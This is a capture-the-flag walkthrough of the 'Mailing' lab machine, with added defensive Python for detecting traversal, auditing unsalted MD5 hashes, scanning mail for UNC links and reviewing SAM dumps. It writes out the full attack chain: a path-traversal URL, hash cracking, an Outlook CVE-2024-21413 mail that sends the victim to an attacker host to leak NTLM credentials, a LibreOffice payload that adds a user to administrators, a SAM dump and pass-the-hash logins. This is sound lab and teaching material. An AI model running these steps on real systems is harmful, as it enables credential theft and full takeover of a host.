# Mailing

Mailing Windows · Easy

#### User tldr

* LFI on port 80
* Cracking the hashed password of the hMailServer admin account
* Zero-click account (NTLM) leak via Outlook

#### Root tldr

* LibreOffice CVE-2023-2255
* Dump SAM creds

## User Flag

First we scan the IP with nmap:

```bash
# Nmap 7.94 scan initiated Thu May 16 02:37:04 2024 as: nmap -sC -sV --verbose -oN reports_10.129.231.40 10.129.231.40
Nmap scan report for 10.129.231.40
Host is up (0.064s latency).
Not shown: 990 filtered tcp ports (no-response)
PORT    STATE SERVICE       VERSION
25/tcp  open  smtp          hMailServer smtpd
| smtp-commands: mailing.htb, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp  open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Did not follow redirect to http://mailing.htb
110/tcp open  pop3          hMailServer pop3d
|_pop3-capabilities: UIDL USER TOP
135/tcp open  msrpc         Microsoft Windows RPC
139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn
143/tcp open  imap          hMailServer imapd
|_imap-capabilities: ACL CAPABILITY IMAP4rev1 IDLE SORT QUOTA NAMESPACE CHILDREN completed OK RIGHTS=texkA0001 IMAP4
445/tcp open  microsoft-ds?
465/tcp open  ssl/smtp      hMailServer smtpd
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Issuer: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-02-27T18:24:10
| Not valid after:  2029-10-06T18:24:10
| MD5:   bd32:df3f:1d16:08b8:99d2:e39b:6467:297e
|_SHA-1: 5c3e:5265:c5bc:68ab:aaac:0d8f:ab8d:90b4:7895:a3d7
|_ssl-date: TLS randomness does not represent time
| smtp-commands: mailing.htb, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
587/tcp open  smtp          hMailServer smtpd
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Issuer: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-02-27T18:24:10
| Not valid after:  2029-10-06T18:24:10
| MD5:   bd32:df3f:1d16:08b8:99d2:e39b:6467:297e
|_SHA-1: 5c3e:5265:c5bc:68ab:aaac:0d8f:ab8d:90b4:7895:a3d7
| smtp-commands: mailing.htb, SIZE 20480000, STARTTLS, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
993/tcp open  ssl/imap      hMailServer imapd
|_imap-capabilities: ACL CAPABILITY IMAP4rev1 IDLE SORT QUOTA NAMESPACE CHILDREN completed OK RIGHTS=texkA0001 IMAP4
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Issuer: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-02-27T18:24:10
| Not valid after:  2029-10-06T18:24:10
| MD5:   bd32:df3f:1d16:08b8:99d2:e39b:6467:297e
|_SHA-1: 5c3e:5265:c5bc:68ab:aaac:0d8f:ab8d:90b4:7895:a3d7
Service Info: Host: mailing.htb; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-05-15T19:37:36
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu May 16 02:38:16 2024 -- 1 IP address (1 host up) scanned in 71.32 seconds

```

SMB, IMAP, POP3 and HTTP are open.

Straight into initial discovery on port 80; first add the host to /etc/hosts:

```
10.129.231.40 mailing.htb
```

So now we know it runs hMailServer.

<figure><img src="https://945112445-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbrxXzY5PMGua4UW86ukK%2Fuploads%2Fyd5Tq3RWwmbwIhZyckR6%2Fimage.png?alt=media&#x26;token=15c164d9-1a44-45bc-94fd-fd75f0879641" alt=""><figcaption></figcaption></figure>

### First user initial foothold

Searched for an exploit right away and found it is vulnerable to LFI: <https://www.exploit-db.com/exploits/7012>

But when we checked, that path wasn't there. So we tried dirsearch:

```bash
200    31B   http://mailing.htb/download.php
```

There is a download.php, so we put the payload straight into it:

{% embed url="<http://mailing.htb/download.php?file=../../../../../../../../../Program+Files+(x86)/hmailserver/Bin/hmailserver.ini>" %}

The exploit-db entry actually uses plain "Program Files" only, but that returned a 404, so we tried "Program Files (x86)" and it was there. The file downloads:
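The traversal above works because download.php joins the `file` parameter onto a directory without checking where the result ends up. The following is an added example (not the box's download.php and not from the original writeup) showing the two pieces a defender wants: a log/WAF-style detector for traversal attempts, and a containment check that canonicalises the decoded path and refuses anything outside the download root. `DOWNLOAD_ROOT` is an assumed directory for the demo; it also unwinds double percent-encoding, which the page's URL does not use but a bypass attempt typically would.

```python
import posixpath
import re
from typing import Optional
from urllib.parse import unquote

# Constructed base directory for the example; the real download.php root is not known.
DOWNLOAD_ROOT = "/var/www/mailing/downloads"

# A '..' path segment (either separator) after decoding; used for log/WAF-style detection.
DOTDOT_SEGMENT = re.compile(r"(?:^|[\\/])\.\.(?:[\\/]|$)")
DRIVE_LETTER = re.compile(r"^[A-Za-z]:")


def decode_request(requested: str) -> str:
    """Undo the encoding a browser or curl applies: '+' as space (as in the
    page's URL) and percent-escapes, including nested encoding such as %252e."""
    decoded = requested.replace("+", " ")
    for _ in range(3):  # unwind a few layers of double encoding
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    return decoded


def looks_like_traversal(requested: str) -> bool:
    """Detection: True when the decoded value contains a '..' segment, an
    absolute path, or a Windows drive letter. Conservative by design."""
    decoded = decode_request(requested)
    if DOTDOT_SEGMENT.search(decoded):
        return True
    if decoded.startswith(("/", "\\")):
        return True
    return bool(DRIVE_LETTER.match(decoded))


def resolve_download(requested: str, root: str = DOWNLOAD_ROOT) -> Optional[str]:
    """Mitigation: return the absolute path to serve, or None when the
    normalised path would leave `root`."""
    decoded = decode_request(requested).replace("\\", "/")
    if decoded.startswith("/") or DRIVE_LETTER.match(decoded):
        return None
    root_norm = posixpath.normpath(root)
    candidate = posixpath.normpath(posixpath.join(root_norm, decoded))
    # commonpath is the containment check; a plain string-prefix compare
    # would wrongly accept "/var/www/mailing/downloads_evil/x".
    if posixpath.commonpath([root_norm, candidate]) != root_norm:
        return None
    return candidate


if __name__ == "__main__":
    for req in ("instruction.pdf",
                "../../../../../../../../../Program+Files+(x86)/hmailserver/Bin/hmailserver.ini",
                "..%252F..%252Fwindows/win.ini"):
        print(f"{req!r}: traversal={looks_like_traversal(req)} path={resolve_download(req)}")
```

The detector is the one to run over IIS logs after the fact; the resolver is what the endpoint should have been doing in the first place. `docs/../instruction.pdf` still resolves inside the root, so the containment check, not the mere presence of `..`, is what decides whether a request is served.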

```bash
cat hMailServer.INI
[Directories]
ProgramFolder=C:\Program Files (x86)\hMailServer
DatabaseFolder=C:\Program Files (x86)\hMailServer\Database
DataFolder=C:\Program Files (x86)\hMailServer\Data
LogFolder=C:\Program Files (x86)\hMailServer\Logs
TempFolder=C:\Program Files (x86)\hMailServer\Temp
EventFolder=C:\Program Files (x86)\hMailServer\Events
[GUILanguages]
ValidLanguages=english,swedish
[Security]
AdministratorPassword=841bb5acfa6779ae432fd7a4e6600ba7
[Database]
Type=MSSQLCE
Username=
Password=0a9f8ad8bf896b501dde74f08efd7e4c
PasswordEncryption=1
Port=0
Server=
Database=hMailServer
Internal=1
```

Put it into a file so we can crack it:

```bash
cat administrator.hash
841bb5acfa6779ae432fd7a4e6600ba7
```

```bash
sudo john administrator.hash --wordlist=/home/replican/Desktop/Prod/CyberSecurity/seclists/Passwords/Leaked-Databases/rockyou.txt --format=Raw-Md5
[sudo] password for replican:
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-MD5 [MD5 128/128 AVX 4x3])
Warning: no OpenMP support for this hash type, consider --fork=12
Press 'q' or Ctrl-C to abort, almost any other key for status
homenetworkingadministrator (?)
1g 0:00:00:00 DONE (2024-05-16 04:39) 3.030g/s 22915Kp/s 22915Kc/s 22915KC/s homepc..homeiyun88
Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably
Session completed
```

So we get the email creds:

<administrator@mailing.htb>:homenetworkingadministrator
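The reason john finishes in under a second is that `AdministratorPassword` is a bare, unsalted MD5 of the password: one hash per wordlist entry is all it takes. As an added example (not part of the original writeup and not hMailServer's own code), the block below audits an INI in the same layout for values that look like raw MD5 digests, shows the single-pass dictionary check that makes such a value fall, and contrasts it with a salted, iterated PBKDF2 store. The INI excerpt and its digest (`md5("password")`) are constructed for the demo, not the box's values.

```python
import configparser
import hashlib
import hmac
import os
import re
from typing import List, Optional, Tuple

# Constructed INI excerpt in the layout of the hMailServer.INI recovered above.
# The digest is md5("password"), chosen for the demo; it is not the box's value.
SAMPLE_INI = """\
[Security]
AdministratorPassword=5f4dcc3b5aa765d61d8327deb882cf99
[Database]
Type=MSSQLCE
PasswordEncryption=1
"""

HEX_MD5 = re.compile(r"^[0-9a-f]{32}$", re.IGNORECASE)


def find_unsalted_md5(ini_text: str) -> List[Tuple[str, str, str]]:
    """Audit: list (section, key, value) entries that look like a bare MD5
    digest. A 32-hex value with no salt or iteration marker is the tell."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.optionxform = str  # keep key case exactly as written in the file
    cp.read_string(ini_text)
    hits = []
    for section in cp.sections():
        for key, value in cp.items(section):
            if HEX_MD5.match(value.strip()):
                hits.append((section, key, value.strip().lower()))
    return hits


def dictionary_check(digest: str, candidates) -> Optional[str]:
    """Why it cracks instantly: one MD5 per candidate, no salt, so a single
    pass over a wordlist covers every password ever stored this way."""
    target = digest.lower()
    for word in candidates:
        if hashlib.md5(word.encode()).hexdigest() == target:
            return word
    return None


PBKDF2_ITERATIONS = 200_000  # demo value; tune upward for production


def pbkdf2_store(password: str) -> str:
    """The corrected form: random per-entry salt plus a slow, iterated hash,
    serialised as algorithm$iterations$salt$digest."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return f"pbkdf2_sha256${PBKDF2_ITERATIONS}${salt.hex()}${digest.hex()}"


def pbkdf2_verify(password: str, stored: str) -> bool:
    algo, iters, salt_hex, digest_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(digest.hex(), digest_hex)


if __name__ == "__main__":
    for section, key, value in find_unsalted_md5(SAMPLE_INI):
        print(f"[{section}] {key} looks like unsalted MD5: {value}")
        print("  dictionary hit:", dictionary_check(value, ["homepc", "password", "letmein"]))
    stored = pbkdf2_store("password")
    print("pbkdf2 verify:", pbkdf2_verify("password", stored), pbkdf2_verify("wrong", stored))
```

With the salted form every account costs a separate run of the wordlist and each guess costs 200k iterations instead of one, which is the whole difference between the one-second crack above and an attack that is not worth running. The other half of the fix is of course that the INI should never have been reachable through the web root.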

### Second user initial foothold

Back to port 80 to open instruction.pdf (the download button at the very bottom).

<figure><img src="https://945112445-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbrxXzY5PMGua4UW86ukK%2Fuploads%2FIzlOW52PraeSmt2PBimu%2Fimage.png?alt=media&#x26;token=dea62640-e484-4b15-8dae-788586c97ca1" alt=""><figcaption></figcaption></figure>

From this we learn that if we send an email, Maya will automatically read it (we assume there is a bot that auto-opens every new message).

That immediately brings to mind the recent exploit in Outlook's email handling (I only knew about it from a hint on the HTB forum :v).

{% embed url="<https://github.com/xaitax/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability>" %}

{% embed url="<https://github.com/lgandx/Responder>" %}

Use Responder together with the CVE to get a zero-click account leak.

For those who don't know, Responder is what captures Maya's creds once we've sent the email.
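What the tool sends is a message whose link points at a UNC path on the attacker's host (`--url "\\10.10.14.45"` below); when the client follows it, Windows authenticates to that host over SMB and Responder records the NetNTLMv2 exchange. The following is an added example (not from the writeup, not from either tool's repository) of the gateway-side check a defender would want: find `file://` URLs and bare `\\host\share` references in message bodies and flag any that point at a host not on an allowlist. The sample messages are constructed; the host in them is the attacker address used on this page.

```python
import re
from typing import Dict, List, Optional

# A file:// URL or a bare UNC path (\\host\share\...) anywhere in the body.
UNC_LINK = re.compile(r"""(?ix)
    (?:file:/{2,}|\\\\)     # file:// scheme or the \\ prefix of a UNC path
    [^\s"'<>]+              # host, share and path, up to a delimiter
""")

# Pull the host out of either form so it can be compared against an allowlist.
UNC_HOST = re.compile(r"(?i)(?:file:/+\\*|\\\\)([^\\/\s]+)")


def find_unc_links(body: str) -> List[str]:
    return [m.group(0) for m in UNC_LINK.finditer(body)]


def extract_unc_target(link: str) -> Optional[str]:
    m = UNC_HOST.match(link)
    return m.group(1) if m else None


def scan_message(subject: str, body: str, allowed_hosts=()) -> Dict:
    """Gateway-style check: flag a message that carries a link to a file
    share unless every referenced host is on the allowlist."""
    links = find_unc_links(body)
    hosts = [h for h in (extract_unc_target(link) for link in links) if h]
    allowed = {a.lower() for a in allowed_hosts}
    offending = [h for h in hosts if h.lower() not in allowed]
    return {"subject": subject, "links": links, "hosts": hosts, "flagged": bool(offending)}


# Constructed messages for the demo; 10.10.14.45 is the attacker host on this page.
SAMPLE_MESSAGES = [
    ("Welcome", "Hi Maya, the onboarding guide is at https://mailing.htb/instruction.pdf"),
    ("XD", r'<a href="file:///\\10.10.14.45\share\report.txt">report</a>'),
    ("Quarterly numbers", r"Please review \\10.10.14.45\docs\q1.docx before the call"),
]


def scan_all(messages=SAMPLE_MESSAGES, allowed_hosts=()) -> List[Dict]:
    return [scan_message(s, b, allowed_hosts) for s, b in messages]


if __name__ == "__main__":
    for result in scan_all():
        print(result)
```

Flagging on the link alone is deliberately coarse: the same `\\host\share` reference is what makes the client start an SMB session, so quarantining or rewriting such links at the mail gateway stops the credential leak regardless of which client-side bug gets the link opened. Blocking outbound SMB (445) at the perimeter is the complementary network-side control.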

```bash
python3 CVE-2024-21413.py --server mailing.htb --port 587 --username administrator@mailing.htb --password homenetworkingadministrator --sender administrator@mailing.htb --recipient maya@mailing.htb --url "\\10.10.14.45" --subject XD
```

```bash
[SMB] NTLMv2-SSP Client   : 10.129.231.40
[SMB] NTLMv2-SSP Username : MAILING\maya
[SMB] NTLMv2-SSP Hash     : maya::MAILING:e6a1aa4dfd95ab9f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
```

Responder picks up Maya's hash, and we just crack it again, this time with hashcat mode 5600:

```bash
Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 491 MB

Dictionary cache hit:
* Filename..: /home/replican/Desktop/Prod/CyberSecurity/seclists/Passwords/Leaked-Databases/rockyou.txt
* Passwords.: 14344384
* Bytes.....: 139921497
* Keyspace..: 14344384

MAYA::MAILING:e6a1aa4dfd95ab9f:546ecae13a0b53bb1e7f662632271430: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:m4y4ngs4ri

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: MAYA::MAILING:e6a1aa4dfd95ab9f:546ecae13a0b53bb1e7f...000000
Time.Started.....: Thu May 16 03:42:48 2024 (1 sec)
Time.Estimated...: Thu May 16 03:42:49 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/home/replican/Desktop/Prod/CyberSecurity/seclists/Passwords/Leaked-Databases/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 19633.9 kH/s (3.17ms) @ Accel:1024 Loops:1 Thr:64 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 7340032/14344384 (51.17%)
Rejected.........: 0/7340032 (0.00%)
Restore.Point....: 5505024/14344384 (38.38%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: minterwint -> ina-123456
Hardware.Mon.#1..: Temp: 52c Fan: 49% Util: 19% Core:1837MHz Mem:7300MHz Bus:16

Started: Thu May 16 03:42:42 2024
Stopped: Thu May 16 03:42:49 2024 
```

Got it, so log in straight away with evil-winrm:

```bash
evil-winrm -i 10.129.231.40 -u maya -p m4y4ngs4ri
```

Go to the Desktop and grab the user flag.

## Root Flag

### First root initial foothold

We check what's in Program Files:

```bash
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\maya\Documents> cd "C:/Program
"C:/Program Files (x86)/"  "C:/Program Files/"        "C:/ProgramData"
*Evil-WinRM* PS C:\Users\maya\Documents> cd "C:/Program Files/"
*Evil-WinRM* PS C:\Program Files> ls


    Directory: C:\Program Files


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----         2/27/2024   5:30 PM                Common Files
d-----          3/3/2024   4:40 PM                dotnet
d-----          3/3/2024   4:32 PM                Git
d-----         4/29/2024   6:54 PM                Internet Explorer
d-----          3/4/2024   6:57 PM                LibreOffice
d-----          3/3/2024   4:06 PM                Microsoft Update Health Tools
d-----         12/7/2019  10:14 AM                ModifiableWindowsApps
d-----         2/27/2024   4:58 PM                MSBuild
d-----         2/27/2024   5:30 PM                OpenSSL-Win64
d-----         3/13/2024   4:49 PM                PackageManagement
d-----         2/27/2024   4:58 PM                Reference Assemblies
d-----         3/13/2024   4:48 PM                RUXIM
d-----         2/27/2024   4:32 PM                VMware
d-----          3/3/2024   5:13 PM                Windows Defender
d-----         4/29/2024   6:54 PM                Windows Defender Advanced Threat Protection
d-----          3/3/2024   5:13 PM                Windows Mail
d-----          3/3/2024   5:13 PM                Windows Media Player
d-----         4/29/2024   6:54 PM                Windows Multimedia Platform
d-----         2/27/2024   4:26 PM                Windows NT
d-----          3/3/2024   5:13 PM                Windows Photo Viewer
d-----         4/29/2024   6:54 PM                Windows Portable Devices
d-----         12/7/2019  10:31 AM                Windows Security
d-----         3/13/2024   4:49 PM                WindowsPowerShell


*Evil-WinRM* PS C:\Program Files> cat "C:/Program Files/LibreOffice/"
"C:/Program Files/LibreOffice/CREDITS.fodt"  "C:/Program Files/LibreOffice/help/"         "C:/Program Files/LibreOffice/program/"
"C:/Program Files/LibreOffice/LICENSE.html"  "C:/Program Files/LibreOffice/license.txt"   "C:/Program Files/LibreOffice/readmes/"
"C:/Program Files/LibreOffice/NOTICE"        "C:/Program Files/LibreOffice/presets/"      "C:/Program Files/LibreOffice/share/"
*Evil-WinRM* PS C:\Program Files> cat "C:/Program Files/LibreOffice/readmes/readme_en"
Cannot find path 'C:\Program Files\LibreOffice\readmes\readme_en' because it does not exist.
At line:1 char:1
+ cat "C:/Program Files/LibreOffice/readmes/readme_en"
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (C:\Program File...admes\readme_en:String) [Get-Content], ItemNotFoundException
    + FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetContentCommand
*Evil-WinRM* PS C:\Program Files> cat "C:/Program Files/LibreOffice/readmes/readme_en-US.txt"


======================================================================

LibreOffice 7.4 ReadMe
```

LibreOffice version 7.4: <https://www.libreoffice.org/about-us/security/advisories/CVE-2023-2255>

```bash
python3 CVE-2023-2255.py --cmd 'net localgroup Administradores maya /add' --output 'exploit.odt'
```

The purpose is to put Maya in the admin group so she can dump the SAM creds.

After that, drop it in C:\Important Documents.

### Second root initial foothold

Maya is now in the administrators group, so dump localadmin's creds right away:

```bash
crackmapexec smb 10.129.231.40 -u maya -p m4y4ngs4ri --sam
SMB         10.129.231.40   445    MAILING          [*] Windows 10.0 Build 19041 x64 (name:MAILING) (domain:MAILING) (signing:False) (SMBv1:False)
SMB         10.129.231.40   445    MAILING          [+] MAILING\maya:m4y4ngs4ri (Pwn3d!)
SMB         10.129.231.40   445    MAILING          [*] Dumping SAM hashes
SMB         10.129.231.40   445    MAILING          Administrador:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         10.129.231.40   445    MAILING          Invitado:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         10.129.231.40   445    MAILING          DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         10.129.231.40   445    MAILING          WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:e349e2966c623fcb0a254e866a9a7e4c:::
SMB         10.129.231.40   445    MAILING          localadmin:1001:aad3b435b51404eeaad3b435b51404ee:9aa582783780d1546d62f2d102daefae:::
SMB         10.129.231.40   445    MAILING          maya:1002:aad3b435b51404eeaad3b435b51404ee:af760798079bf7a3d80253126d3d28af:::
SMB         10.129.231.40   445    MAILING          [+] Added 6 SAM hashes to the database
```

Got it, just log in again with WinRM:

```bash
evil-winrm -i 10.129.231.40 -u localadmin -H "9aa582783780d1546d62f2d102daefae"
```

Done, back to the Desktop again and there's the root flag.
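The root step works because the NT hash from the SAM dump is accepted directly by evil-winrm (`-H`), so any account whose NT hash leaks is as good as its password. As an added example (not part of the writeup and not crackmapexec's code), the block below parses secretsdump-style SAM lines, using the crackmapexec output above as its sample input, and reports what a defender reviewing such a dump looks for: accounts with no password set (NT hash of the empty string), any account still storing an LM hash, and NT hashes shared between accounts, which is the case where one captured hash unlocks several logins.

```python
import re
from collections import defaultdict
from typing import Dict, List

# NT hash of the empty string: an account whose NT field equals this has no
# password set (typically a disabled built-in). The LM field value
# aad3b435b51404eeaad3b435b51404ee is the empty LM hash, i.e. LM storage is off.
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"

# user:rid:lmhash:nthash::: at the end of a line, as secretsdump/crackmapexec print it.
SAM_LINE = re.compile(r"(\S+):(\d+):([0-9a-f]{32}):([0-9a-f]{32}):::\s*$", re.I)

# Sample input: the SAM lines from the crackmapexec output above.
SAMPLE_DUMP = """\
SMB         10.129.231.40   445    MAILING          [+] MAILING\\maya:m4y4ngs4ri (Pwn3d!)
SMB         10.129.231.40   445    MAILING          [*] Dumping SAM hashes
SMB         10.129.231.40   445    MAILING          Administrador:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         10.129.231.40   445    MAILING          Invitado:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         10.129.231.40   445    MAILING          DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         10.129.231.40   445    MAILING          WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:e349e2966c623fcb0a254e866a9a7e4c:::
SMB         10.129.231.40   445    MAILING          localadmin:1001:aad3b435b51404eeaad3b435b51404ee:9aa582783780d1546d62f2d102daefae:::
SMB         10.129.231.40   445    MAILING          maya:1002:aad3b435b51404eeaad3b435b51404ee:af760798079bf7a3d80253126d3d28af:::
SMB         10.129.231.40   445    MAILING          [+] Added 6 SAM hashes to the database
"""


def parse_sam_dump(text: str) -> List[Dict]:
    """Extract user, RID, LM and NT hash from every line that carries a SAM entry."""
    entries = []
    for line in text.splitlines():
        m = SAM_LINE.search(line)
        if m:
            entries.append({"user": m.group(1), "rid": int(m.group(2)),
                            "lm": m.group(3).lower(), "nt": m.group(4).lower()})
    return entries


def audit_sam(entries: List[Dict]) -> Dict:
    """Report empty-password accounts, stored LM hashes, and NT hashes shared
    by more than one account (password reuse: one captured hash, many logins)."""
    empty = [e["user"] for e in entries if e["nt"] == EMPTY_NT]
    lm_stored = [e["user"] for e in entries if e["lm"] != EMPTY_LM]
    by_nt = defaultdict(list)
    for e in entries:
        if e["nt"] != EMPTY_NT:
            by_nt[e["nt"]].append(e["user"])
    shared = {h: users for h, users in by_nt.items() if len(users) > 1}
    return {"empty_password": empty, "lm_stored": lm_stored, "shared_nt_hash": shared}


if __name__ == "__main__":
    entries = parse_sam_dump(SAMPLE_DUMP)
    for e in entries:
        print(f"{e['user']:<20} rid={e['rid']:<5} nt={e['nt']}")
    print(audit_sam(entries))
```

On this dump the three empty-hash entries are the disabled built-ins, LM storage is off, and no two live accounts share a hash, so the finding that matters is simply that `localadmin`'s NT hash was readable by a user who could add herself to the administrators group. The detection hook for that is the group-membership change the LibreOffice payload makes (`net localgroup ... /add`), and the mitigation for the replay is per-host unique local admin passwords (LAPS) plus restricting local accounts from network logon.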
